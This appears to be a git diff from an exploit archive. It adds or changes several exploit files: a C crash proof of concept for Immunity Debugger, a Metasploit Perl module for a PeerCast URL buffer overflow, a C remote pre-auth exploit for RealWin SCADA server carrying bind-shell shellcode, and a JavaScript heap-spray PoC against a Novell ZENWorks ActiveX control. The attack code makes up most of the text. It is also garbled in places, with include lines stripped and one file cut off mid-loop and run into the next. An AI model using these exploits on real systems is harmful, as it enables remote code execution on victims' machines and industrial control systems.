+cO5KLKX4hrRSM10tay3tNlkXZLMtPiiUSdbfe6oMb7KFv98tXvrj39Rq6dcqVo5b +PFq0pFZL1JJJ1S86Jo+eLTWoBXJSpyj6uvqqpCONV6ysjb09RW01ZqqsYOTM1dWw +Fu+XMtTcSipAoKMOFrxDkEvVHVYZW1nH+sWz5ys1azPiO3Sk3NnYoVax20ksS9Wq +TEv1CPCnDariWxTSfQ22tErsQqwNb6FXlYsoZTLtnq70KlN5KpKNacqZzUbQ3DbX +VtLqYvqps+RqHsc561oFgzJdIkNrV9SAN3dvG6UCpRHU0rvWWejXktWJyUnEJQOm ++/he2VPUKUmqmFKu48tP0NRBKBauqa/V+EhT0tdSyNoeUgOyyTJZSJaSWJSvry5g +y6N5buuTY8iEZO7qQaVOX1TCpXPy5Up2VVOy2N5e/NfP9SIuUgkW7bjSxFHyZdM1 +ysPSsB6mj4NrYXL0CoNT6GSuJL8CCnf87NkTcBPbItco7t2zjI0Yp3Eh9IiQbknO +W8FiRkXuqXS91d7OyjFWzl2blDkMfN1N/ich/l81RPLlEdysZyZSym13LJ/K+NJe +0mUj+/UJr5crMjh/Kw7pva/6QMQ9ewBABwA= + diff --git a/platforms/windows/dos/32435.c b/platforms/windows/dos/32435.c new file mode 100755 index 000000000..74ea7d55e --- /dev/null +++ b/platforms/windows/dos/32435.c @@ -0,0 +1,46 @@ +/* Filename : Crash_POC.cpp + +# Exploit Title: [title] +# Date: 20 March 2014 +# Exploit Author: Veysel HATAS (vhatas@gmail.com) - Web Page : www.binarysniper.net +# Vendor Homepage: https://www.immunityinc.com/ +# Software Link: https://www.immunityinc.com/products-immdbg.shtml +# Version: 1.85 +# Tested on: WinXP, Win7 + +*/ + +#include +#include +#include + +int g_Count; + +void foo(char *data); + +int main(int argc, char* argv[]) +{ + g_Count = 0; + + foo(argv[1]); + return 0; +} + +void foo(char *data) +{ + char salla[10]; + + printf("Deneme - %d\n", g_Count); + g_Count++; + + if (g_Count == 510){ + strcpy(salla, data); + } + + try{ + foo(data); + } + catch(int e){ + printf("Error code is : %d", e); + } +} \ No newline at end of file diff --git a/platforms/windows/remote/1626.pm b/platforms/windows/remote/1626.pm index 876369f50..c376b3ce3 100755 --- a/platforms/windows/remote/1626.pm +++ b/platforms/windows/remote/1626.pm @@ -1,119 +1,119 @@ -## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. -## - -package Msf::Exploit::peercast_url_win32; -use base "Msf::Exploit"; -use strict; -use Pex::Text; - -my $advanced = { }; - -my $info = - { - - 'Name' => 'PeerCast <= 0.1216 URL Handling Buffer Overflow(win32)', - 'Version' => '$Revision: 1.2 $', - 'Authors' => [ 'H D Moore ', ], - 'Arch' => [ 'x86' ], - 'OS' => [ 'win32' ], - 'Priv' => 0, - - 'AutoOpts' => { 'EXITFUNC' => 'process' }, - - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The target port', 7144], - 'SSL' => [0, 'BOOL', 'Use SSL'], - }, - - 'Payload' => - { - 'Space' => 400, - 'BadChars' => "\x00\x0a\x0d\x20\x0d", - 'Keys' => ['+ws2ord'], - 'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500 - }, - - 'Description' => Pex::Text::Freeform(qq{ - This module exploits a stack overflow in PeerCast <= v0.1216. - The vulnerability is caused due to a boundary error within the - handling of URL parameters. -}), - - 'Refs' => - [ - ['OSVDB', '23777'], - ['BID', '17040'], - ['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'], - ], - - 'Targets' => - [ - ['Windows 2000 English SP0-SP4', 0x75023360 ], - ['Windows 2003 English SP0-SP1', 0x77d099e3 ], - ['Windows XP English SP0/SP1', 0x77dbfa2c], - ['Windows XP English SP0/SP2', 0x77dc12b8], - ], - - 'Keys' => ['peercast'], - - 'DisclosureDate' => 'March 8 2006', - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Exploit -{ - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - my $target_idx = $self->GetVar('TARGET'); - my $offset = $self->GetVar('OFFSET'); - my $shellcode = $self->GetVar('EncodedPayload')->Payload; - my $target = $self->Targets->[$target_idx]; - - my $pattern = Pex::Text::AlphaNumText(1024); - - # Return to EDI (offset 812) - substr($pattern, 768, 4, pack('V', $target->[1])); - - # Jump back to the shellcode - substr($pattern, 812, 5, "\xe9".pack("V", -517)); - - # Insert he payload at offset 300 to avoid corruption - substr($pattern, 300, length($shellcode), $shellcode); - - my $sploit = "GET /stream/?". $pattern ." HTTP/1.0\r\n\r\n"; - $self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1])); - - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'LocalPort' => $self->GetVar('CPORT'), - 'SSL' => $self->GetVar('SSL'), - ); - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return; - } - - $s->Send($sploit); - $self->Handler($s); - $s->Close(); - return; -} - -1; - -# milw0rm.com [2006-03-30] +## +# This file is part of the Metasploit Framework and may be redistributed +# according to the licenses defined in the Authors field below. In the +# case of an unknown or missing license, this file defaults to the same +# license as the core Framework (dual GPLv2 and Artistic). The latest +# version of the Framework can always be obtained from metasploit.com. +## + +package Msf::Exploit::peercast_url_win32; +use base "Msf::Exploit"; +use strict; +use Pex::Text; + +my $advanced = { }; + +my $info = + { + + 'Name' => 'PeerCast <= 0.1216 URL Handling Buffer Overflow(win32)', + 'Version' => '$Revision: 1.2 $', + 'Authors' => [ 'H D Moore ', ], + 'Arch' => [ 'x86' ], + 'OS' => [ 'win32' ], + 'Priv' => 0, + + 'AutoOpts' => { 'EXITFUNC' => 'process' }, + + 'UserOpts' => + { + 'RHOST' => [1, 'ADDR', 'The target address'], + 'RPORT' => [1, 'PORT', 'The target port', 7144], + 'SSL' => [0, 'BOOL', 'Use SSL'], + }, + + 'Payload' => + { + 'Space' => 400, + 'BadChars' => "\x00\x0a\x0d\x20\x0d", + 'Keys' => ['+ws2ord'], + 'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500 + }, + + 'Description' => Pex::Text::Freeform(qq{ + This module exploits a stack overflow in PeerCast <= v0.1216. + The vulnerability is caused due to a boundary error within the + handling of URL parameters. +}), + + 'Refs' => + [ + ['OSVDB', '23777'], + ['BID', '17040'], + ['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'], + ], + + 'Targets' => + [ + ['Windows 2000 English SP0-SP4', 0x75023360 ], + ['Windows 2003 English SP0-SP1', 0x77d099e3 ], + ['Windows XP English SP0/SP1', 0x77dbfa2c], + ['Windows XP English SP0/SP2', 0x77dc12b8], + ], + + 'Keys' => ['peercast'], + + 'DisclosureDate' => 'March 8 2006', + }; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + +sub Exploit +{ + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + my $target_idx = $self->GetVar('TARGET'); + my $offset = $self->GetVar('OFFSET'); + my $shellcode = $self->GetVar('EncodedPayload')->Payload; + my $target = $self->Targets->[$target_idx]; + + my $pattern = Pex::Text::AlphaNumText(1024); + + # Return to EDI (offset 812) + substr($pattern, 768, 4, pack('V', $target->[1])); + + # Jump back to the shellcode + substr($pattern, 812, 5, "\xe9".pack("V", -517)); + + # Insert he payload at offset 300 to avoid corruption + substr($pattern, 300, length($shellcode), $shellcode); + + my $sploit = "GET /stream/?". $pattern ." HTTP/1.0\r\n\r\n"; + $self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1])); + + my $s = Msf::Socket::Tcp->new + ( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'LocalPort' => $self->GetVar('CPORT'), + 'SSL' => $self->GetVar('SSL'), + ); + if ($s->IsError) { + $self->PrintLine('[*] Error creating socket: ' . $s->GetError); + return; + } + + $s->Send($sploit); + $self->Handler($s); + $s->Close(); + return; +} + +1; + +# milw0rm.com [2006-03-30] diff --git a/platforms/windows/remote/32426.c b/platforms/windows/remote/32426.c new file mode 100755 index 000000000..8e7d68f01 --- /dev/null +++ b/platforms/windows/remote/32426.c @@ -0,0 +1,214 @@ +source: http://www.securityfocus.com/bid/31418/info + +DATAC RealWin SCADA server is prone to a remote stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. + +An attacker can exploit this issue to execute arbitrary code in the context of the affected application. This may facilitate the complete compromise of affected computers. Failed exploit attempts may result in a denial-of-service condition. + +RealWin SCADA server 2.0 is affected; other versions may also be vulnerable. + +//////////////////////////////////////////////////////////////////// +//// DATAC RealWin 2.0 SCADA Software - Remote PreAuth Exploit -. +//// -------------------------------------------------------- +//// This code can only be used for personal study +//// and/or research purposes on even days. +//// +//// The author is not responsible for any illegal usage. +//// So if you flood your neighborhood that's your f******* problem =) +//// --------------- +//// Note +//// --------------- +//// ## The exploit has been tested against a build that seems pretty old. +//// ## Therefore this flaw may be not reproducible on newer versions. +//// +//// http://www.dataconline.com +//// http://www.realflex.com/download/form.php +//// +//// Ruben Santamarta www.reversemode.com +//// + +#include +#include +#include + +#pragma comment(lib,"wsock32.lib") + + +#define REALWIN_PORT 910 +#define PACKET_HEADER_MAGIC 0x67542310 + +#define EXPLOIT_LEN 0x810 +#define PING_LEN 0x200 + +#define FUNC_INFOTAG_SET_CONTROL 0x5000A +#define FUNC_PING 0x70001 + + +typedef struct { + const char *szTarget; + ULONG_PTR retAddr; +} TARGET; + + +TARGET targets[] = { + { "Windows 2000 SP4 [ES]", 0x779D4F6A}, // call esp - oleaut32.dll + { "Windows 2000 SP4 [EN]", 0x77E3C256 }, // jmp esp - user32.dll + { "Windows XP SP2 [EN]", 0x7C914393 }, // call esp - ntdll.dll + { "Windows XP SP2 [ES]", 0x7711139B}, // call esp - oleaut32.dll + { NULL,0xFFFFFFFF} +}; + +int main(int argc, char* argv[]) +{ + WSADATA ws; + SOCKET tcp_socket, tcp_ping; + char bBuffer[0x10] = {0}; + struct sockaddr_in peer; + char *pExploitPacket = NULL; + char *pPingPacket = NULL; + ULONG_PTR uFixed; + + /* win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */ + unsigned char scode[] = + "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa5" + "\xd8\xfb\x1b\x83\xeb\xfc\xe2\xf4\x59\xb2\x10\x56\x4d\x21\x04\xe4" + "\x5a\xb8\x70\x77\x81\xfc\x70\x5e\x99\x53\x87\x1e\xdd\xd9\x14\x90" + "\xea\xc0\x70\x44\x85\xd9\x10\x52\x2e\xec\x70\x1a\x4b\xe9\x3b\x82" + "\x09\x5c\x3b\x6f\xa2\x19\x31\x16\xa4\x1a\x10\xef\x9e\x8c\xdf\x33" + "\xd0\x3d\x70\x44\x81\xd9\x10\x7d\x2e\xd4\xb0\x90\xfa\xc4\xfa\xf0" + "\xa6\xf4\x70\x92\xc9\xfc\xe7\x7a\x66\xe9\x20\x7f\x2e\x9b\xcb\x90" + "\xe5\xd4\x70\x6b\xb9\x75\x70\x5b\xad\x86\x93\x95\xeb\xd6\x17\x4b" + "\x5a\x0e\x9d\x48\xc3\xb0\xc8\x29\xcd\xaf\x88\x29\xfa\x8c\x04\xcb" + "\xcd\x13\x16\xe7\x9e\x88\x04\xcd\xfa\x51\x1e\x7d\x24\x35\xf3\x19" + "\xf0\xb2\xf9\xe4\x75\xb0\x22\x12\x50\x75\xac\xe4\x73\x8b\xa8\x48" + "\xf6\x8b\xb8\x48\xe6\x8b\x04\xcb\xc3\xb0\xea\x47\xc3\x8b\x72\xfa" + "\x30\xb0\x5f\x01\xd5\x1f\xac\xe4\x73\xb2\xeb\x4a\xf0\x27\x2b\x73" + "\x01\x75\xd5\xf2\xf2\x27\x2d\x48\xf0\x27\x2b\x73\x40\x91\x7d\x52" + "\xf2\x27\x2d\x4b\xf1\x8c\xae\xe4\x75\x4b\x93\xfc\xdc\x1e\x82\x4c" + "\x5a\x0e\xae\xe4\x75\xbe\x91\x7f\xc3\xb0\x98\x76\x2c\x3d\x91\x4b" + "\xfc\xf1\x37\x92\x42\xb2\xbf\x92\x47\xe9\x3b\xe8\x0f\x26\xb9\x36" + "\x5b\x9a\xd7\x88\x28\xa2\xc3\xb0\x0e\x73\x93\x69\x5b\x6b\xed\xe4" + "\xd0\x9c\x04\xcd\xfe\x8f\xa9\x4a\xf4\x89\x91\x1a\xf4\x89\xae\x4a" + "\x5a\x08\x93\xb6\x7c\xdd\x35\x48\x5a\x0e\x91\xe4\x5a\xef\x04\xcb" + "\x2e\x8f\x07\x98\x61\xbc\x04\xcd\xf7\x27\x2b\x73\x4a\x16\x1b\x7b" + "\xf6\x27\x2d\xe4\x75\xd8\xfb\x1b"; + + int i,c; + + system("cls"); + printf("\n\t\t- DATAC RealWin 2.0 SCADA Software -\n"); + printf("\tProtocol Command INFOTAG/SET_CONTROL Stack Overflow\n"); + printf("\nRuben Santamarta - reversemode.com \n\n"); + + if( argc < 3 ) + { + + printf("\nusage: exploit.exe ip TargetNumber"); + printf("\n\nexample: exploit 192.168.1.44 1\n\n"); + for( i = 0; targets[i].szTarget; i++ ) + { + printf("\n[ %d ] - %s", i, targets[i].szTarget); + } + printf("\n"); + exit(0); + } + + WSAStartup(0x0202,&ws); + + peer.sin_family = AF_INET; + peer.sin_port = htons( REALWIN_PORT ); + peer.sin_addr.s_addr = inet_addr( argv[1] ); + + tcp_socket = socket(AF_INET, SOCK_STREAM, 0); + + if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(sockaddr_in)) ) + { + printf("\n[!!] Host unreachable :( \n\n"); + exit(0); + } + + pExploitPacket = (char*) calloc( EXPLOIT_LEN, sizeof(char) ); + pPingPacket = (char*) calloc( PING_LEN, sizeof(char) ); + + memset( (void*)pExploitPacket, 0x90, EXPLOIT_LEN); + memset( (void*)pPingPacket, 0x90, PING_LEN); + + uFixed = targets[atoi(argv[2])].retAddr; + + for( i=0x0; i< 0xbe; i++) + { + *( ( ULONG_PTR* ) (BYTE*)(pExploitPacket + i*sizeof(ULONG_PTR) +2 ) ) = uFixed; + } + + // Bypass silly things. + *( ( ULONG_PTR* ) (BYTE*)(pExploitPacket + 0xbe*sizeof(ULONG_PTR) +2 ) ) = 0x404040; + + // MAGIC_HEADER + *( ( ULONG_PTR* ) pExploitPacket ) = PACKET_HEADER_MAGIC; + + //Payload Length + *( ( ULONG_PTR* ) pExploitPacket + 1 ) = 0x800; + + //MAKE_FUNC(FC_INFOTAG, FCS_SETCONTROL) + *( (ULONG_PTR*)(( BYTE*) pExploitPacket + 10 ) ) = FUNC_INFOTAG_SET_CONTROL; + + //First Parameter + *( (ULONG_PTR*)(( BYTE*) pExploitPacket + 14 ) ) = 0x4; // Internal Switch + + //Mark + *( (ULONG_PTR*)(( BYTE*) pExploitPacket + 44 ) ) = 0xDEADBEEF; // Our marker + + + memcpy( (void*)((char*)pExploitPacket + EXPLOIT_LEN - sizeof(scode)) + ,scode + ,sizeof(scode)-1); + + send(tcp_socket, pExploitPacket, EXPLOIT_LEN, 0 ); + + printf("[+] Exploit packet sent...now checking host availability\n"); + + // MAGIC_HEADER + *( ( ULONG_PTR* ) pPingPacket ) = PACKET_HEADER_MAGIC; + + //Payload Length + *( ( ULONG_PTR* ) pPingPacket + 1 ) = 0x20; + + //MAKE_FUNC(FC_INFOTAG, FCS_SETCONTROL) + *( (ULONG_PTR*)(( BYTE*) pPingPacket + 10 ) ) = FUNC_PING; + + //First Parameter + *( (ULONG_PTR*)(( BYTE*) pPingPacket + 14 ) ) = 0x1; // whatever + + //Mark + *( (ULONG_PTR*)(( BYTE*) pPingPacket + 44 ) ) = 0xDEADBEEF; //Our marker + + tcp_ping = socket(AF_INET, SOCK_STREAM, 0); + + if ( connect(tcp_ping, (struct sockaddr*) &peer, sizeof(sockaddr_in)) ) + { + printf("\n[!!] Host died, long live to the Host! \n\n"); + exit(0); + } + + i = recv(tcp_ping, bBuffer, 0x8, 0 ); + + if( i ) + { + printf("[+] The host is up and running\n\t:: %d bytes received: ",i); + for( c = 0; c < head> < title>Novell ZENWorks for Desktops Version 6.5 Remote (Heap-Based) PoC < /head> < body> < script> var buffa1 = unescape("%uce90%u08bc") do { buffa1 += buffa1; } while (buffa1.length < 0x900000); var buffa2 = unescape("%u9090%u9090") do { buffa2 += buffa2; } while (buffa2.length < 0x1500000); buffa1 += buffa2; buffa1 += unescape("%uC929%uE983%uD9DB%uD9EE%u2474" + "%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" + "%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" + "%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" + "%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" + "%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" + "%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" + "%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" + "%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" + "%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + "%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" + "%uCC4A%uD0FF"); < /script> < object id="victim" classid="clsid:0F517994-A6FA-4F39-BD4B-EC2DF00AEEF1"> < /object> < script language="vbscript"> appName = String(300, "A") + "?????" victim.CanUninstall appName < /script> < /body> < /html> \ No newline at end of file